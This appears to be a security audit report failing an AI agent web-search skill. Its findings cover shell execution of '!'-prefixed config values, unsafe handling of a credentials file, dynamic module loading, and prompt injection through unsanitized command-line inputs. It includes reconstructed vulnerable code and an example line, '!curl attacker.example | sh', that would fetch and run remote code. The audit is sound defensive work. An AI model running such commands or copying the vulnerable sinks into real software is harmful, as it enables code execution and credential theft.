native-web-search
Verdict: Fail
Audited by Gen Agent Trust Hub on Feb 27, 2026
Risk Level: HIGH
Tags: COMMAND_EXECUTION, CREDENTIALS_UNSAFE, REMOTE_CODE_EXECUTION, PROMPT_INJECTION
Full Analysis
- [COMMAND_EXECUTION]: The function `resolveConfigValue` in `search.mjs` utilizes `execSync` to execute shell commands if a configuration string starts with an exclamation mark (`!`). Since this function is used to resolve API keys from the `auth.json` file, an attacker who can influence this file can achieve arbitrary command execution.
- [CREDENTIALS_UNSAFE]: The script explicitly reads from and writes to `~/.pi/agent/auth.json`. This file is known to contain sensitive authentication material, including long-lived API keys and OAuth refresh tokens for AI services.
- [DYNAMIC_EXECUTION]: The `loadPiAi` function uses dynamic `import()` to load the `@mariozechner/pi-ai` module from computed paths. It searches through several locations, including environment variables, parent `node_modules` directories (walking up 8 levels from the current working directory), and hardcoded development paths. This behavior can be exploited to execute malicious code if the script is run in a directory with a compromised `node_modules` tree.
- [INDIRECT_PROMPT_INJECTION]: The skill is vulnerable to prompt injection via user-controlled inputs.
  - Ingestion points: The `query` and `purpose` variables are read directly from command-line arguments (`process.argv`).
  - Boundary markers: No delimiters or instructions to ignore embedded commands are present in the `buildUserPrompt` function.
  - Capability inventory: The script has the capability to perform network requests via `fetch`, execute shell commands via `execSync`, and write to the filesystem via `writeFileSync`.
  - Sanitization: There is no sanitization or escaping of the `query` or `purpose` strings before they are interpolated into the final prompt sent to the LLM.
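The two sinks described above can be sketched as follows. This is a hypothetical reconstruction, not the skill's actual source: the function names `resolveConfigValue` and `buildUserPrompt` come from the audit, but their bodies are assumed from the described behavior.

```javascript
// Hypothetical reconstruction of the flagged patterns (assumed code).
import { execSync } from "node:child_process";

// Command-execution sink: a config value beginning with "!" is executed
// as a shell command and its stdout used as the value. Anyone who can
// write auth.json therefore controls an arbitrary command.
function resolveConfigValue(value) {
  if (typeof value === "string" && value.startsWith("!")) {
    return execSync(value.slice(1), { encoding: "utf8" }).trim();
  }
  return value;
}

// Injection sink: argv-derived strings are interpolated into the prompt
// with no delimiters or escaping, so embedded instructions pass through
// to the LLM verbatim.
function buildUserPrompt(query, purpose) {
  return `Search the web for: ${query}\nPurpose: ${purpose}`;
}
```

Run against a writable `auth.json`, a value such as `"!curl attacker.example | sh"` would be executed during ordinary key resolution.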
Recommendations
- Do not install or run this skill until the findings above are remediated: remove the `execSync`-based resolution of `!`-prefixed config values, stop reading and writing `~/.pi/agent/auth.json` directly, pin the `@mariozechner/pi-ai` import to a fixed, trusted path instead of walking parent `node_modules` directories, and delimit or sanitize the `query` and `purpose` inputs before they are interpolated into the prompt.
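A minimal hardening sketch for the two sinks, under the same assumptions as above (the `Safe` function names and the `<untrusted>` delimiter convention are illustrative choices, not the skill's API):

```javascript
// Hardened sketch (assumed code): treat config values as opaque strings
// and never execute them.
function resolveConfigValueSafe(value) {
  if (typeof value === "string" && value.startsWith("!")) {
    // Refuse executable config values outright instead of shelling out.
    throw new Error("executable config values are not allowed");
  }
  return value;
}

// Wrap untrusted CLI input in explicit boundary markers so the system
// prompt can instruct the model to treat the delimited region as data.
// Stripping the closing marker prevents trivial delimiter escape.
function buildUserPromptSafe(query, purpose) {
  const fence = (s) => `<untrusted>${String(s).replaceAll("</untrusted>", "")}</untrusted>`;
  return `Search the web for: ${fence(query)}\nPurpose: ${fence(purpose)}`;
}
```

Delimiting does not eliminate prompt injection on its own; it only gives the surrounding system prompt a boundary it can reference when telling the model to ignore embedded instructions.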